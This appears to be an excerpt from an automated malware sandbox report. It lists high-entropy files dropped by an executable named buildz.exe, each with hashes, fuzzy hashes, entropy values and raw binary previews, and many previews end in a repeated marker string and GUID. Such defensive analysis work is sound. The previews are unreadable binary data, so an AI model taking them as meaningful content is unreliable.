                        Preview:<?xml....]...q.5o.....<...d.#.a....wF.ZG*O.t.k%1..>......~..>.%...h.....T;G..Ql8k.y...S.=..#zu...F.._.i...=(.}Wm..p.;;.J.rS?\..cd\..~....T8.x.....y.j.&..K+O\*.^.....S......F.... ......C..^...2y..^.!.:.bg...o.G..)....9=.sE.<Y.A.{....j$_..6..'j@\0..... ....'..s.b....S_V.......9..:...g..E.SJ..?D.... !Y_...A.T=..J....].7k...}...XdN..%.....N.V\../..'..$...8.g.~l...0SM,..y....p.T......\.C.....=...|.[_.....O1.....K&.C...eC.l..2AJ...l..s.....<dk......w..^ .c}f..E...!.@M......MJb.G.j......... .)...R>.*...u.B...,%)...".k.A.<..y.I.W....J....L....X.....9...........(.+.........I s:9.U.J....-..H.....y"&....gg..F.....K.m..>.....;3>.r..\..I.BC..n..*@.`...........C.....1..3..H,A.U.7L...&..........C......+...<m...-.\O..."^....q#.w....h.....JR...A.T+.....,<a..F.....D..5l..DC..>.Z....d.I..G...D.B>...m.71..c..6r{.....G.%.Mdt.>.;3..4....m/...<{.Y.....S/:..)......`.A..Ou....v......#...G.#[8.@.7....y..>.uN...G@.A....Z.d.Z"j4..^...).EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):920
                        Entropy (8bit):7.765454176570636
                        Encrypted:false
                        SSDEEP:12:vSfkGvQ0TZgatrLVS6Ig0fCRc65JhddGTsxOjxSU01OYdE/JqUGZWpnVW89M1FmV:vfSRKrMhdyIGxSUPYK/JqvEpVYgncGbD
                        MD5:BB389061CDAEB03CA610CC456EA5B58E
                        SHA1:8A206C41E874968B816F3E0CFA0FA52BDCEA5CFF
                        SHA-256:A68B640D8550E8B4ED73533A16BBA4C04469BE51E77792ED9D27A756EC636C0B
                        SHA-512:0F19B0782208AA6BA47C272C178B213C50CE61B38929D0061B138B0CE24C7F78A38DD79C0818F5626669C7D4961372928FAFAA38CE799DC7C9B14140463836EC
                        Malicious:false
                        Preview:<?xml.b...M."eZl%.................j.@.B./....{.|....;..E%%O]...".}...K....>....,.t.=V.|U....ph$.7..I.^..2.....!.}.$..i..2.H.i_b1..0*..bM.....>A.F.....@.......P....&.....:.r.l..:.7;.5.[z.....1R{kX.!;.k....D.VA.j....d...l.DQgbpL.<`.{.(....c...........u&...+.....$L..Yv.8..L.(.....T.O.#..|76...h.".g.T.T...S..un..``....P........6.C.=w.^....o.&.....s....)\&.qYj...?........!.....\4.f..BH-D:......P......2...)......<z.....6>..Sl..'.J.|.7.....u..0....=.R...P....qO.^.hGq........7C..y.Z./..3.9.D.Ux......O.......X..#.c2f...J[@.H..lW....\....r..........L.i+\SZ..6:..3..U0.umc9..i.;nL.2)yx.."1.....X.9.,..4...]s...O..R..<m3...-.>......S..dF....nJi[>.q..-...!y. ..[O..L.......M).f....x...er.<i4z........k...../B].b.C"./..[..E..U.................j....f.eZl..u...2..@...,....g...H.d....:';J2d.e.g2.b.L'.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1147
                        Entropy (8bit):7.792109896601701
                        Encrypted:false
                        SSDEEP:24:WPNWpkfly18Z52EIkw81qrLRwK2eAX343GbD:WPkpkNyGBiLatX343UD
                        MD5:F06521E9E9084F98ECAEE41F7648295D
                        SHA1:D8F2F3F4093E3C81995BA72D3A97DAD1777BEFF2
                        SHA-256:80EBE36B682909532E58A1A19CC96E590AF9C23446E8DD7236796E23D1B81BEF
                        SHA-512:10C52821631A3F6B6591D98443ACFB0C60D618ECCFC205ED1200566CCC576B3DCB50B9D31415D66F675D4B6FC8387455941F8C72F706AACCB24D73B0633E1D6C
                        Malicious:false
                        Preview:<?xmlObj.x...6.g..l.,F..........J.v..!}..I...C.13.ML..Lo..,.....V...T...AUT.._(x.y.QT|m.3.L.......@..5;L3..a.B0J...CVY......>.A.r.......F...f..5.2.q...%X....bmmk[...._..._...4>NlQ;m...t.g..$..~........h... ..qk../r4Rl.9M&H..%1...ry.].o...J.......v.....g&j...7.}..u(#.,Y...kf~M.S..7D.~.WKx..{.....|t..x[.F$.....H'...Q.2)D.../NN..s..N...c..W..].g....V*9..X.YS.uv..|...J...,T....:..M.QA."..`0.*[6....w.l.i.3.....:.?..j-&.`.8.9LQ..>...H.;A....^|'a.....]udd,....x.f.?..2O(.B..Z..7...D.2...oH.-.<....Y.d:....\[.../).8..8.t.6..+,.?q..Hg.k.g.C.....!..7.72GY..Y].C..WTR\!.z..)..p.[$9!W.b.@..2.&......M.5.......0\...<.g.)6.2.....D.-$)".W..Y&....+.^.L".#>....">.......O....^........z...-F.M..]......#....*D.;.#.B....Y,.u...{.B*...../.'......D>.7..U..EA...W.2h...S.E..q..Uk C.......2..`xxJ .\c.~.u]..-V;.....h0$a.F.Jn.f.,..C.(.u. ..D..V......tu...i,E....I\.. .....yo.MM..|O....R.....qr...r.g.St.6..`.)....L~mD$.6.A%.h^.o.}....R;..p...0u.... VR....<..5....x]..N
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1141
                        Entropy (8bit):7.80398021269045
                        Encrypted:false
                        SSDEEP:24:q/jFHANPavPKxW3ayfoUPnWohZxjyaFg6FH75nIHCCHWN0SKWg4O4TkGbD:ejFHANPavce9foOhZxW6Fb92HWN0SKOn
                        MD5:3A700AC9154A602CD262F6849DA491B6
                        SHA1:259F2435AD53E924DC85BA67A3D2055C23501A83
                        SHA-256:4584F2D48E37AEEE3EC9992FD0B1E316446B2855BBB2B2B02B0B2E2B2B85F884
                        SHA-512:06A9E5A7D44C13FFCC5072B6A9302111F310F11CF2F6BC4E5023580544A37107555FDA8DE0F059776E6C7076EC10D5DB2F02B211724380A308E2D85E6AE7CEBB
                        Malicious:false
                        Preview:<?xml2.q.8<..Rt.".=.x....!.^.I..j...?[..g..v...D...<.a[.....Y_.T}.[...... .9Z.R.nI:#..../n...?..jTd....y.b.j.H.Qk}..7..U.s1.}^w...N...$..R.h.....N..1.tg^..2..s:wxb.$....2......+..c....~.Tw.....o..[g~{.^.mz.k......Z7.P..'....^.....:.p[~..[g..9w.Bo..V...c.||.....OqS..!.m.g<.O........:T....v-.......+.D.?...H..#o.x....{O.G.....X>w..........Y...#.5N..O1\..]=B....@......[.d..).-X.F-.]...t.f5.'....B.r..../.\I.....-.i ..Y.t.S-.....1.C.......x=..C.>I......H&.P.>......N..).R.w.E.D.k.P..,#.k.v.Y...mW..1.)..J.[/.Z..Ad.-..#....>)VO.?...r3..R...3..lq.$.o....B..P}...UCS...9SV...\.v7....l.0.O....X...Q..6ysr....{.pn...9..t.].|.;.LB....V-..67.,...-..[........:..|.....z....tz~..Z.M.0.E.. .h:._s.@.....+@....0ty.L.&.............^..b...C....XQ.9..Q.............A.-.Z}.y..]..X^dg.<Z....Fw.U.r^..}.......ES.l.b#..)#.&.7N.[..me.|...............2..$.x.\..A.....).Z.LcT....d.M.......X..\?uR.......s#<..<...{...G...?U4..A..|.d.1......!....$.. ........S......8I{....V-
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1145
                        Entropy (8bit):7.848589079796081
                        Encrypted:false
                        SSDEEP:24:+/5J65CCTTzuB7PATBIySMCYLd/yFTW3RVU1Q1zGeL3GbD:KJ65CWmB7SWMZdKFTy0Q1zGeTUD
                        MD5:2AD07597BACE2203BC58B26E2C5B2C21
                        SHA1:46DBF4C98495044B3DDD3C86FED5F95839909018
                        SHA-256:940EB7B5ED2A6CD0F5FE0A2044DC75E02DE4A47346A6288E4315D83B80E963C5
                        SHA-512:AB186F1407D650C36016DCCB18B25DA194843858C1AE2C7FDBBABC82A45358FB48557BAF8D3B13619B5ED7B25841A9BC1B6612D5A8DB851D964B6310F5BBCCED
                        Malicious:false
                        Preview:<?xml..U...c\......w .y.04.m..4m&.....)f~F..4......Q.I.T.B....xH.S.....,`.j.C@..M.%...+1..FZ'./.....=.......0~v}B..j...Xf.....r.:E.(...!t.#..:...P<0Re...8...B..bk..nWt.,.Y>x.....4....C.C.Y..A..qZZ>.xz..OT.{)..;d...v...........:../....$r.,wK..Zz.._<....j.j.......2|xK..2h.R."..L...?....i..n.;U...=..z...fc.`..\..K...!.o..{.]+h.&......&S...H.....p~UU.....wj..dI..c3$...CX.w.?.+ft;{?.9....qo|L..o.V.......X.q.7.@..@w=.+.q.......u..X>..u/..OYx..B.2.K..8dI...|.Pg.)K.../.D..RU..R..HG.T..U.....G....u ....k}..z.e...*.....#.O+..l..o...c.zN.]..f3\....,%.<..j.).%... .=NM..-...%.......Q.r^.t.ip..aX4^..Ov....N.......'.g.U#o.r.*.avC....D".G. .fT.Y..z.1.....v..=..2yIU..f2.G.6..q`...R|.0...b.J.....[.....n.....a..L...t7...Q..^_s.....**A.Y.Q......pr.....+...7....E./.xPz.VDHw.e$...l..)1..y2.0.F..V.36.j(...:.B....Zz...g{./.lW.67......E.$..V.g.KV.s.../h#........78(.)...k.U.Xj........e...t9..........Q.%..k...!.D.eA.".qL....e...#.....M.%,.n..+..GLA."&...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1145
                        Entropy (8bit):7.802918789345223
                        Encrypted:false
                        SSDEEP:24:6+AhztYxgoWyMOMm0qCJ9jFB3mllxMw6GbD:6NogA2jKT6w6UD
                        MD5:B6A4E6B160FEE4CD7D86B0E10E75FDB7
                        SHA1:DE9269B93DEC7643EB415E8A75CA5D2255FAF5F4
                        SHA-256:377AD5C100380A6E511E307F81154D64515E37F2EC2BF0C369E9A6A25218E393
                        SHA-512:BF9D67FE5B23F6BB6DAC61997176D8683E93A41451FB56804DC7B53A1BCF95378232B48338185197BF3C3DBD79BB2D7736F5EA48908C0FA57D70073D29580FD0
                        Malicious:false
                        Preview:<?xml&.(p0.OB-.w...8.f.9...I.:.<......*.k..e...........rv.p...M.&.....[J......8.d..7...I.m-X..3..\.9..Qy.+.`:BEm....-G....F...U.u8( }.......A..-..*...H.v.j..(.....q...m.h,.S.J....(...bM.D.l...............yi.8...].m........9....}.S#.........[..B.5..2XX...'fV..k...eD...U..B2J......B.*.-v..E.Y..N.H.^....].>A..6).$.$o..\q...4.LE.6...U..."g.p.d.....k...~3..C.........{.Rz|i....B..D+.SM..#...Qkk.EN7.V.6..Y.........bI'....(.&.....W..p...!...5..4...H.O.(P.#...T.......I.r%.+..........9z.!.(.l...Fy..!.wU.K.....e..*..P.../w..(..c..(?mR.H.o.5/.".-e.v....].D.....?-..<2l.....Z....5.u.......).{..Q#o.j..Pv.q...jq<....w..Z.ed<@.S..3..Ln.X ... ...g'..~;..~|.3S=...e:.......Q..2..6..{G6......0.-z.:..jX..._@.l....=..I~....~......?@...../Aj.....y:...6....u...M....h.....L].._0...oo.,.&....R.N.2... .....B.G.~s..&?..@.,..0...y.2.='.?.d..XPZ..<.. )........?.t..D.....Y........|&...e|o.}1Nk1.......[......vg..U.a...2.).#..2..5.@.t...V....]..K...b...d...c..M.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1145
                        Entropy (8bit):7.798418284860584
                        Encrypted:false
                        SSDEEP:24:nHgt9ETEiPEbG2xdGowfw67flJuAp6TOGbD:nANiPhCdGowfRNUAwTOUD
                        MD5:BC58D0AE5CAEA5AFCEB8BEA66EFB7482
                        SHA1:501A11444EF92F71224548FBB6DBD68B6E06F19F
                        SHA-256:352B070ACCA2310FC6770F8B1CD5BE2E66E32E00247BBB431712DBC3D07A09BF
                        SHA-512:63C56BC453CD315AB3DBF15B0526C49C947F8E1BF7CCEEE51ADABEF283CC99BBC9748EFC37042104743CF5536DEC12D51A2C7724F5BA477636DD9B33D655B550
                        Malicious:false
                        Preview:<?xml^...z....O*...h....LO4Xt.....q.4..+f8...?.N}T...^V. .&...~.....>......gv."..uW.....|o...~..!..yc....@.SP..o.?8B.H...@.$..w9G..yx.|.......}.......)....H.i.6v....4].....dz..d.D.RLw.=."..Z...W..).....VmO...Ew_.c%.'9..od.7n%........<.>5.......J.#.x....|Y0.....S...h.EA...&......h....\.A...b..C.o.........gR.l0......5^>.h3;.X...D..h..%.\.....-E9.E...^V..V.$/.z..y..?..R>..@..`.[:..,1e....K...............y.@..|n..T.....91...8T<..p.!h...N.....^4..lL.GbX..Y1...bQ..1.v1.\"-..HU...Q..,&.+h.....o=!(^sq..EM=..e.].._....\...N.qq.'c[..#..C....5G...a....}.-W0...x.A...E.1L.......^..zhh..\..D.......o.pK......../..n}.W....e.T.....{.%1.%.{.Z,..r..c..v.D..7.....+..=.e...}9....zW......q._.H..M.E...[..l.........W...(OV6.z.........~.h"R gz.B)....:.s...81.7U:%~~.a#Y....b.ED2}...ET. X...1.......C...J.(.cl........|..|..'1u....n.xc..tE.}./...}5..n... |[.&}....V..#.1!...@....yZ........w3Ty.@.ul....,.e.3..r.....H%..B....X ...W.er.6IT*VV...A3..3.J..-\.NL2.d.!.5.2.. c........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1144
                        Entropy (8bit):7.789320897990533
                        Encrypted:false
                        SSDEEP:24:EB3rysyLO8S50VHoYjzU7i//OB5pImbs9bvNMuE1iObbwJLs8wcy+lmGbD:EB4L6GIYjT/cbs5bE1iOHwJLsYy+UUD
                        MD5:6853170D12DAFB7B5695C27439C1A90E
                        SHA1:01A3B4D220C3838F6C60A4C40D02F4D8569294CB
                        SHA-256:0E728138BA3F3477620640770CCCD6D39548A889887D363653A434E4DF381ECF
                        SHA-512:9E91A60E85E535EE2F07ECE9DF6E8ACAA07AAD8F17972787F0A034FE500764169ED4A51879E807B58E16FE6C1BB325B1C42028F91A4379A85E665687381AAA97
                        Malicious:false
                        Preview:<?xml.KL..sCf..d..P..4...K...R........^b._->.|..,...........rpi..s.]-q0.EQk..n.N... ^n3.\.)dfB..l.1[.......).B.....X..S.[...Bn...=.Eb./..W..|[.E}..].........=1..9...(a...]..r..H.....E.w.5..A.F..t..:.......SK|...........q7...g&..aT.._..]..W...g.t..,.A+.X........aa._.#W.;93>n.C.0C..... ......U:XC..V}.]X..G;..F..&.M!X.f..._pf...'p..j..KZ.......U5...a1{.1.bU. ...........<../..p....@.(........vqZMC.V.j.U.;O....8.<...0........?.."..{z..1].Q........"dF..~7y.)....R..Y..i....k._H~....o$.|....)wD6...W.ae..J..(6sih.z!|z...(.k..6Y..b..0..g.......'.X..}.g...`....om(:..F<q.I+...._.u....Y".Yh G5..k&9.f.......I....oJ...J.#c..../...t.{.!.$S^...........h@.1.......y..I.K......I\.78Y.O..q...w[F..7.}.G..K.Z~.w..\....p..D..".+...6vD@n......UV<;.e].v...o?(...[Q6N.{.'.....].Z..?..1]O_T..\W{.MXk..;51..W.V..3?*j......-..Mh..x.v...:........4.#.v+~h..1uS>..U(..N..vC>.[....<d..........3.H.j%....`....*....r=.X6[|.I?.N..<V.4m......jz...x..T..5+..6...|8..!....$>.9..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):848
                        Entropy (8bit):7.746089525329146
                        Encrypted:false
                        SSDEEP:24:lw2RtypBaAAaFVJdVeddIdFkCzlcuu0gChFVdGbD:lw2HysaF3dNuCzlICDfUD
                        MD5:4AF6966732D55C05519C5F78E848338E
                        SHA1:0DFBEC7E29C3C442F149B3E8A73A1E352450D297
                        SHA-256:85A9D0A59BE094BDF4214AE33513B595345C06E71B4181EE24A011F51CC02279
                        SHA-512:CCB0EC9ACF9F4F50A3847486BB824A995B8958C52510AAB12383520A6EC1058D78ED2A102EDDBE337D85C1595C1FC760267DBF0876F21205E505AEE62BAF8258
                        Malicious:false
                        Preview:<?xml..!Z.X.........IyO9Vw......H.e..uc.....qv.xDh..{.I...]Y.....)....T. ...O:4.nZ....[=.K.7i.....X ..x..N..x..\a...G....t.......jF.Z....#..6../....M_HN.[.p.D".\...{k.p(5.....g...g'..7.Z.U.}.Z..<...*jZ.. x/..3.......r...L.a.|[../d.}.\J......i6.`....&J..... ..1;.....H.Y.......{.O$M.i.wf.D...!].1D.5....36pH......n.gi.R9.c.&r.KO.{>...N..[.....L...}.p.}.c.QH~....."..A<..G...2.1.&.G.0p..>..w.\....V...r..i"..^,..........y..+.....}..............=._.......0FDR..{..N.J....p...:7... ]..}^{.......h...W.,N..3.j...*..........Y..8.V..6....\.(.....C;P.$..e..n.J.'.V.....|[8..v.......}{W~..+.A3...F.D...(...q~..].>..,;D7.&..{...K=o...G.&.l.m51f..s.g...v......k.O.....A...t..8jg.b[....)..Q.~...........cd.......j..y...)i^w.7Lc.m..I...7.O)(z.Q.QEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):767
                        Entropy (8bit):7.6975156573208485
                        Encrypted:false
                        SSDEEP:12:FLm8c6k8VlNFqTBGivt7h8f317Vfcpna8TQMcxGUfEZETIEiV44Oh2J5S35U/26A:FLL3zVYTBL743xVfcpnaXMcAUyETtDUm
                        MD5:9DBF5C49F143D29EEA62C7DB26C51BE4
                        SHA1:C3C94CE8ACB8A9BDE9D04C50EFF1B9E1EC9D0ADE
                        SHA-256:5BD9861BD2A91240FD37B472CFA394B3D2EA8EDF53D93D59F851B21219D0C3D4
                        SHA-512:1AB43940DDE7647056894D9732A614B3B5E74ADF9DAF7BD51B8F75667C99D035977764FA9816CA2A25C948A41B39FF6E29D49C5E110AC6F50C3409B66B715975
                        Malicious:false
                        Preview:<?xmlW...+..."......&....u.'..c.7.....c. ....].]G.+(qe6.1.......7).....Z..4...`#.a.AQ.9.Wz..w5N#i..'."".4....%..V.&.=.(.........-.g..u.Yg..@..{x....nx......\..... ..?4OW.qM+G.k....g...L........M.........Q..Y3F...|QrP.....Zy...=!{.......xJ*8..<..[\..0X....v..c|....]Y..$x......i.#.&.b..y...)....y..}r.)..$.N$/.dO...f..........b<..N.Jji.......{.a.k?E....v...`.=.1....l.^L.....1yf.V..J..:..m.v..+...dA>eZL.[.z....1._x.H.e....W......E...@.......,........%..1.cd.u/..|....?..k...kV..N2`.f"..V.q.yD...U.7N.&.:_.4."#....-...!...~Z.........~.yCdk........S.l.b.h.f.N.'.........e...bPB..5.."..Y...?P.Y.Lkl....k...0..Kk5....7.3.J4k.........,..u.l...7.]..B].1^.......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):845
                        Entropy (8bit):7.733682734994276
                        Encrypted:false
                        SSDEEP:24:xQU83iD+D5fM8kFB03+H615M1P5n2nGbD:xQZ9b005n+hn2nUD
                        MD5:9C1BD69C7D1AB905203C4A5D195B6723
                        SHA1:F5DFE461F685A609C8B4631BE5037BF693D60C81
                        SHA-256:B56BCD396F2D89FCE43EBFB33A7C3C1B889F0958D06B5760C7EFC66299CBC319
                        SHA-512:C153B4D04FA2068799BC02051EAFBA241D70A23BD9CB2ABDAAE94930987438D12A4F7417F76E3695A47A2C0AE3EF05EA83574A901DF5A5F84B3F82752F3AD037
                        Malicious:false
                        Preview:<?xml....?$..q.d|..;.X......W.Zg"..n.N..0........J...z..w..R82.@..kw...Rm.....q.^...ox]..P2.;.h....]o: .....T..4D.....d,.?.Zf[.hyA....S.!..=.......$........RB)M...&.'u.....N..3..`.i...*.....{;.!MJ...p.tY.0%.....B...&da......w...|".8U.U".k.[@.y..f .C....A.........a~.w...Efy..(@..!..V.w..f0.#..P^..ZZtLl:.E......T...^.....+.LlXvg...6.N7h.....#g%...;B..ri^.TO.v.:.9@.j.T=.S/......X..|........S...*..E..'8Y...'.H....%..:3......E/. "Y.......0...P.)........4y...Bs..H..%.\......L..pM......*.4...+...0W2Q>j3....+..~y.W..j;.....:......`...r.l....4.'..;..{......,.F..`Lk.V..j..z-........v.....Hb..Eo^.Vo.,.....0...{.e....Z$..|=b7RU.~.4.G..S..w...*.....D..^..8[....i.@..v.....L:!.4..:.B@-MH.<...oH4....|.S..J..o..X).....lPq..7S....Z4.j4Mi.A.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1233
                        Entropy (8bit):7.838126530385277
                        Encrypted:false
                        SSDEEP:24:EIUE6dT1hMf2WrRmwiACp1isS1F/swrpsW8moLSByL9zmhFGbD:E66x1+2ORmwIpxSfPdshmoLSBcZmfUD
                        MD5:9092182B96D4234637ABC4DB7FA27AC3
                        SHA1:9AF5D40352D5CC1368B8D6355264D5A3F5999BFD
                        SHA-256:80712387982FBFBA360E942F7C57B72B4400C7CDC3D351CBD67CD29B9D23A77C
                        SHA-512:7B82584E9F048E8D466E2D89034A751AA1A23030EBE66415DCAB38E5963610F38D928B3284798171096C4FA0BA61F9F38DA876D45998EDD167D6B96569D3B482
                        Malicious:false
                        Preview:<?xmlr.n.^bQl..Y..!..j.{.fl.]9.F.S...@..)..g.-...p[.I....Q0.nm.N.z..._.=...Z.Px...>...TE....,^.@.6....X....V.'=;....;g.P.....T...N.=Iv.........0..1..w..o..y..I6..?..........z"f..".).>....q..'...jR..".....jw[};3R..........c.`n.).+...[..7..`..N`..Y|g...F%b.7Q..1.L#.>b.H^.j@o...l..ix...,.+..S....4?..&+..........0X_..:5.xh04....Kp=......;.......<g..2.As......V:5............g.?.%..&O..Pg....o~..V......r|Z....RC.A.b...#``.J......tA1.....A..{..W.._..He...(....n......>.....?.^A..[.LM..~p......vi.(......~...H-...De....<...<.\zo......._..[.~........n.{U._.<.\.:.cA.3./3..v7;.o.....O|d.&....@]......h.*.].Q..].Y.)y.'....p..N...I...s.......-Os....!W.w....D..7..0...~N.Kc..z.....1LDB.y.=,y<...b.....~...U.#..P;.*...M.....9a.k...E;.:.e.P.Ts._..f..E.+.5..b[..P..e....3B4...4.4..Z.\..........$....x.Y...._k[O.M..,...&.T.ZR9.`....X.....{..f.._......-zd....Ja..6FQ$:.cJxd....?......_..R....m.or.nS-.Z.....LE.j...R..1....-.ox-T..r...T......eHL.^S....M..l./..[I
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):934
                        Entropy (8bit):7.772064017924286
                        Encrypted:false
                        SSDEEP:24:6HT0thRd73mskGGSZEDSPliQM/miY9JBqzWv9sL9GbD:6ABdzmskqaDSPcQM/mbIWVsBUD
                        MD5:5FFDC50D549562ECB4E081A3070FDBFE
                        SHA1:3E2F2B82F5B08E138ED9B0E86592811671622566
                        SHA-256:D0F9A357194CEFC5A4077EC45C682B2619334E42C2F07D3488D82AC74BF3009C
                        SHA-512:D1F36B17986FE80EF962E5943AEB4F2CC771C825F7494F6044D3DC4B9E7AEBE7474190D44373E07897EF34C359DF256425215FDEB3BCFEE6CA86BF27AAD42C25
                        Malicious:false
                        Preview:<?xmlv..]..Ex.....].h..._..."..G"E..M.{.....iUx.l...$.....c.yy..5.....f|....-S..hJ.f.#.vn..]...?..P..C..m'..1....e..Z....3..,...,....6..).Q.......o....=..H^x...Z...<9.r.#...6...m..g..SXt.=t)..8~...B.~..#..JH./#.6m.}.6iz&.A.y..PG:E.!T|O.Cln.lL.........8Ld.v..@.....[...8.}..Ep.*"..=..e..Sg...^...I.M...bY.q.4....u...Jrl2CI.....F.X..t*.Qp]9..XG.......*...J.D.#.>.nUh...r.8...CD..#.`XC...+...8.o].G..F_x.'.I6....5..C1v..]..S..j...c...^...o......`.. ..`.x{...G...m....<.P1.2R./G....+..L.3I.Q..(.k$..>...#../ .o........l..c...j.`....N>_b.h..Fde.....a....?..2.Ig.%.. .._$..L.6.2...5.PU.>.$..c.?!.......h....j...jY. ....2Q...AlV.M./|.;....a.C*..... B..wa.f...D,...K......+7O}.R.0..f..i.<`.a...nsG....*.wL....&..Q...b..&I3G...3.6.A.(....../..@A6f.B6.Sp.I.je5.5=yw.a1...n..W0..pM.^.tzsyv........D2.s.".>C..]3.&<.....Y#l/.f[..._EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):969
                        Entropy (8bit):7.775029487899744
                        Encrypted:false
                        SSDEEP:24:2Do6dGqxBJHaqBf/TzuTasxp79yUAPqylYLnh8KRRGbD:s/dZaW3WTJgUAPHYTKKRRUD
                        MD5:A282E092FD41742EF087043E208E98BD
                        SHA1:F017321BFF5A16AA57DA5D9D97B40BB5B0ACD85C
                        SHA-256:235EBC986E3922D208617AC87C652BA3AF5C2ECF354619C81FB6CB509D1E6D04
                        SHA-512:516D7453A3EF4572411140F64B77DBC63CFF79688758A9EB9F57DAA06B7DF9A742CCF0297A831E86649310AE63CA1A2DC9765ED19E090C46A123D1B5C6A57CCB
                        Malicious:false
                        Preview:<?xml..+..]..^r.y.N...p....t.5.Cu../W*i../.....b[.X.6|.'.yy.5.@.......B%A.L...S.E...C....).:F~\....2.T..8...i..`.A....h@\.'].q.......aG...q."....4.:i.Zs-F.0......\5.?....O..a.+...=..yM..._....E.k.-J,......7..Yrk.d.VY?.@@..S.i-|..f..mt".?V..'.s..VI{.].N..*.AG.l}.p...l...|k.;|.OU.....kH..a<p.E../.0..PQ.T2.SL..C...s.....X......'K...'.D...T.._N.'<.7.Q#..(.UN...}..uV...-...S.M..,,.zq,(SZ.."X.b.W.I|Y.EH{.X.WH..(....I..V.J...?.h.4....'.y..`.`.n.y.C.b)...w..R&..V.:..S..6.V:.{tC..:@.....e.w.3...l.(.p.I.%<...x..&cx..8R.......0%a...o...+...#.6"ZB"......<.......^.k.>.(n..j.Y.....C~P..g.0C_m..(._.....6..IoT.."...k.V..]w. ..o....R;....@P]...;.t..=..3..*...f...c...........]..-`.h..`...a.N...D.......z.|.[....-..r..m.<|`.BU..HG.....7..a.gt.(O<....Ph1r..P.L..[..s.*"i.Y.'.1.xV.Md.j. ...1:z.H>.3...n.B..w2.T..3._.?Op..........g =LDM ......O....Y.....9N.=.w..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1467
                        Entropy (8bit):7.860396582728389
                        Encrypted:false
                        SSDEEP:24:GFnNkPMmwMsoERNhX8MWIef9jhAU1syCbLvDlZvbKUzofNs2E3r0xAs2EJyv637A:GFNk0mwEE5X8jFZCnp9mEb3I7OUUD
                        MD5:61D9D3E27741F1CB8969256E905C62D9
                        SHA1:1BEC099DC4C5FFF33F1F9DC5EA78E00BC44295AD
                        SHA-256:5FD746B157707E46A0FEFCDC5DDAA87358A7C251BEFC88A118E107E469F7E26A
                        SHA-512:1EEDD418467BC4DAC7C4A807F1F2A14E624C4B966443593C9FB76CBB26572FEF9318C9AF987CA138CF7FA5F0233644929DD9AE9AEE9517BD3E92D863F39E2689
                        Malicious:false
                        Preview:<?xml..._$7p.H..6...}.....o......bF.../.C..5..W%.N.#.........B.f..0q...fI..u.+..u.C.fn....t..:.......a.....(.......|..`...53.~<....J.y>.2..i"...]X.f.h..i..q.?W..Km5.x.u.k..*.$39{.K..v....)6.........+...F.....qX,..........Gq....n...k.qd~.)\...l......|I..Pt..N....XrQ.b.i...J.i.P{....Y.qTO.{...K,._.).\S.K.c...FU5W.Qh......8...C..?;...9.}-OL.1....9`.?..gh.C....2..vQ.w.....$.oV.....o.6.8..&.........}.>a.Ma..KA}<v.L*O(....I#.*@....O#:;.8.3.......>...%.9.............a.0....F..........(p=G.w.%.a....1..,E.o.{9'..........ZE.Q.4.xhw.F.......vx.R+.C..wj.'.....^g#..zQ#_.Bt.6T...u.#v..1..B........o."2.L.V..Z...2......|.f....+/......b.....5g.?.P...",..E=.8,QPY.ek.&.3.".n.>...r]n{xh.$\.<...s}t...1.......n...?....e>....8..%..yel....E.=../Es.7...}.+..W.....3.\.o..8.n8L[y.|..P.......)7E..$....>.....PC..3~...H8. <@C....a........E...M$.06.2}..O............Z>...N"_0..Z~J......mX.....l..g.y..R..W.Bg._.*.;..k....%.5.^G@l.'+..._wAa:...g...0.k..[.0.W.....;
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1397
                        Entropy (8bit):7.846760716335199
                        Encrypted:false
                        SSDEEP:24:n1u4xF1cLYicv29qQinwaNwPrDtWx8EU5ccmmqy2/pqdD8R4QS07bF4GbD:nvL1UY19nwaN25Wx/K2mqy2kY5SWyUD
                        MD5:0AD4255D2C98586AD97C5A76B45EFFC8
                        SHA1:C1CE699D92E27C7CCEFEEA0076B2AFCD570977F5
                        SHA-256:74433C15C79EFB6C7694472DBD82B497D6A56A795F7D5E3FC4EA955AC24BDDAC
                        SHA-512:ED6D0F844A0E50B7499EC555130CC74E040CDB3ADB4BA07FE12597CA9ED5E092872949A8B6BFF0472BE64FDC02B48B4665AD2A6E22BC6B1D59FF2E032C365680
                        Malicious:false
